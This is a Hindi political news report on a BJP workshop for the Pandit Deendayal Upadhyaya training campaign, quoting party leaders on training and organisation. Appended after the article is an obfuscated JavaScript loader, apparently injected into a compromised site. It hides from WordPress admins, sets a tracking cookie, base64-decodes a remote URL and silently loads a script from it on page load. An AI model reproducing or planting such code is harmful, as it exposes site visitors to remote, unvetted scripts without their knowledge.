प्रदेश कार्यालय में पंडित दीनदयाल उपाध्याय प्रशिक्षण महाअभियान के निमित्त जिला योजना कार्यशाला का आयोजन हुआ। इस कार्यशाला में प्रदेश अध्यक्ष आदित्य साहू, नेता प्रतिपक्ष बाबूलाल मरांडी, प्रदेश संगठन महामंत्री कर्मवीर सिंह, पूर्व प्रदेश अध्यक्ष दिनेशानंद गोस्वामी एवं प्रदेश उपाध्यक्ष बालमुकुन्द सहाय मुख्य रूप से उपस्थित थे।
इस अवसर पर प्रदेश अध्यक्ष आदित्य साहू ने कहा* कि भाजपा में राष्ट्र और संगठन सर्वोपरी है। भाजपा का हर एक कार्यकर्ता राष्ट्र प्रथम की भावना से कार्य करता है। निश्चित रूप से इस प्रकार का अभियान कार्यकर्ताओं को वैचारिक, व्यवहारिक एवं नेतृत्व के स्तरों पर निपुण करने का काम करता है।
नेता प्रतिपक्ष बाबूलाल मरांडी ने कहा कि इस प्रशिक्षण का मूल उद्देश्य सभी कार्यकर्ताओं को संगठन की कार्यपद्धति और सेवाभाव के मूल मंत्र से जोड़ना है। यह प्रशिक्षण कार्यकर्ताओं में समाज के प्रति संवेदनशीलता और दायित्व बोध जागृत करने का भी सशक्त माध्यम है।
संगठन महामंत्री कर्मवीर सिंह ने कहा कि पंडित दीनदयाल उपाध्याय का अंत्योदय और एकात्म मानववाद का दर्शन ही भारतीय जनता पार्टी की कार्यसंस्कृति की मूल आत्मा है। प्रशिक्षण केवल जानकारी देने भर का माध्यम नहीं होता बल्कि कार्यकर्ता के व्यक्तित्व निर्माण की प्रक्रिया है।
इस कार्यशाला में प्रदेश पदाधिकारियों के अलावा सभी जिला अध्यक्ष एवं कई कार्यकर्ता भी उपस्थित रहे।(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();














